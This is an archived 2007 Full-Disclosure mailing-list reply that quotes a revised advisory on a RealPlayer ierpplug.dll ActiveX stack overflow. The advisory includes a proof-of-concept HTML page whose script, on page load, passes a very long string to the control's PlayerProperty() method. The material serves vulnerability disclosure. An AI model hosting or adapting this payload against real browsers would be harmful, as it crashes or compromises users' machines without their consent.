[Full-disclosure] UPDATED: RealNetworks RealPlayer ierpplug.dll ActiveX Control Multiple Stack Overflows
James Matthews
nytrokiss at gmail.com
Tue Nov 27 00:24:16 GMT 2007
Ouch!
On Nov 26, 2007 9:15 PM, Elazar Broad <elazarb at earthlink.net> wrote:
> After some creative Googling, I am revising my original post. I believe
> that the Import() method overflow that I originally posted is really
> http://www.securityfocus.com/bid/26130, although I am not sure why Linux
> is listed under the "Vulnerable" section, so I am taking it out of the PoC
> code. Real claims to have patched this back in October, but I can still
> throw a stack overflow exception via this function using the originally
> stated version of RealPlayer(which I installed last night). I am now listing
> this vulnerability as RealNetworks RealPlayer ierpplug.dll ActiveX Control
> PlayerProperty() Method Stack Overflow, and it might be wise to list this
> under a separate BID. PoC as follows:
>
> -------------
> <!--
> written by e.b.
> -->
> <html>
> <head>
> <script language="JavaScript" DEFER>
> function Check() {
> var s = "AAAA";
>
> while (s.length < 999999) s=s+s;
>
> var obj = new ActiveXObject("IERPCTL.IERPCTL");
> //{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}
>
> var obj2 = obj.PlayerProperty(s);
>
>
> }
> </script>
>
> </head>
> <body onload="JavaScript: return Check();">
>
> </body>
> </html>
> -------------
>
> Elazar
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
http://www.goldwatches.com/coupons/
http://www.jewelerslounge.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071127/c1ca6de6/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.